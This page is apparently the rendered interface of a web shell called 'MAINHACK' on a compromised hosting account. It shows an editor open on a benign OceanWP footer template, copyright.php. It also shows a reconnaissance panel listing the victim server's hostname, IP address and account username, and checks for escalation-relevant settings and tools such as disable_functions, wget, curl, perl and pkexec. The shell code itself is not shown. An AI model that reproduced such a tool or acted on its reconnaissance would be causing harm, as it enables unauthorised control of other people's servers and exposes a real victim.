[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: copyright.php
<?php /** * The default template for displaying the footer copyright * * @package OceanWP WordPress theme */ // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } // Get copyright text. $copy = get_theme_mod( 'ocean_footer_copyright_text', 'Copyright - WordPress Theme by OceanWP' ); $copy = oceanwp_tm_translation( 'ocean_footer_copyright_text', $copy ); // Get footer menu location and apply filters for child theming. $menu_location = 'footer_menu'; $menu_location = apply_filters( 'ocean_footer_menu_location', $menu_location ); // Visibility. $visibility = get_theme_mod( 'ocean_bottom_footer_visibility', 'all-devices' ); // Inner classes. $wrap_classes = array( 'clr' ); if ( ! has_nav_menu( $menu_location ) ) { $wrap_classes[] = 'no-footer-nav'; } if ( 'all-devices' !== $visibility ) { $wrap_classes[] = $visibility; } $wrap_classes = implode( ' ', $wrap_classes ); ?> <?php do_action( 'ocean_before_footer_bottom' ); ?> <div id="footer-bottom" class="<?php echo esc_attr( $wrap_classes ); ?>"> <?php do_action( 'ocean_before_footer_bottom_inner' ); ?> <div id="footer-bottom-inner" class="container clr"> <?php // Display footer bottom menu if location is defined. if ( has_nav_menu( $menu_location ) ) : ?> <div id="footer-bottom-menu" class="navigation clr"> <?php // Display footer menu. wp_nav_menu( array( 'theme_location' => $menu_location, 'sort_column' => 'menu_order', 'fallback_cb' => false, ) ); ?> </div><!-- #footer-bottom-menu --> <?php endif; ?> <?php // Display copyright info. if ( ! empty($copy) ) : ?> <div id="copyright" class="clr"> <?php if ( ! empty($copy) ) { echo wp_kses_post( do_shortcode( $copy ) ); } ?> </div><!-- #copyright --> <?php endif; ?> </div><!-- #footer-bottom-inner --> <?php do_action( 'ocean_after_footer_bottom_inner' ); ?> </div><!-- #footer-bottom --> <?php do_action( 'ocean_after_footer_bottom' ); ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium264.web-hosting.com
Server IP: 69.57.162.13
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 73.67 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kidscntx
User ID (UID): 1154
Group ID (GID): 1112
Script Owner UID: 1154
Current Dir Owner: 1154